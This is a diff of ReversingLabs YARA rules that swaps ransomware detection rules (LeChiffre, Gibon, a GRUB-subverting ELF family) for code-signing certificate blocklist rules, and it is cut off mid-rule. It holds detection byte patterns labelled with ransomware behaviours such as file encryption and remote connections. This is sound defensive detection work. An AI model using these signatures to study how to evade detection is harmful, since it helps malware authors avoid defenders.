-            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
-        }
-		$subvert_grub_2 = {
-            48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ??
-            ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ??
-            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48
-            8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 4C 8D 85 ?? ??
-            ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ??
-            ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 B9 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 08 C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 8B 85
-        }
-		$subvert_grub_3 = {
-            48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 85 ?? ?? ??
-            ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? EB ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89
-            85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ??
-            48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D B5
-            ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 83 C4 ?? EB ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ??
-            ?? 48 83 BD ?? ?? ?? ?? ?? 74 ?? 4C 8D 85 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 8D
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 56 48 8D
-            B5 ?? ?? ?? ?? 56 4D 89 C1 49 89 F8 BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 83 C4 ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B
-            55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and ( pe.signatures [ i ] . serial == "00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" ) and 1673395200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11632-L11648"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $search_files and ( all of ( $encrypt_files_* ) ) and ( all of ( $subvert_grub_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LeChiffre ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11650-L11666"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LeChiffre"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45
-            ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B
-            D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45
-            ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ??
-            ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection_2 = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection_3 = {
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ??
-            ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ??
-            8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF
-            75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_1 = {
-            E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B
-            03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ??
-            ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ??
-            68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_2 = {
-            E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00
-            8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
-        }
-		$find_files = {
-            E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ??
-            84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46
-            33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B
-            F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75
-            ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ??
-            8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
-            45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ??
-            ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENS CORP" and pe.signatures [ i ] . serial == "34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11668-L11684"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Dibies" and pe.signatures [ i ] . serial == "08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gibon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f1a5bee-8fc0-5596-b898-e97073731930"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "135d638c-9ee5-52cf-a6e7-c12e4feef594"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11686-L11704"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Gibon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_server_connection_1_0 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
-            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ??
-            ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ??
-            83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$remote_server_connection_1_1 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
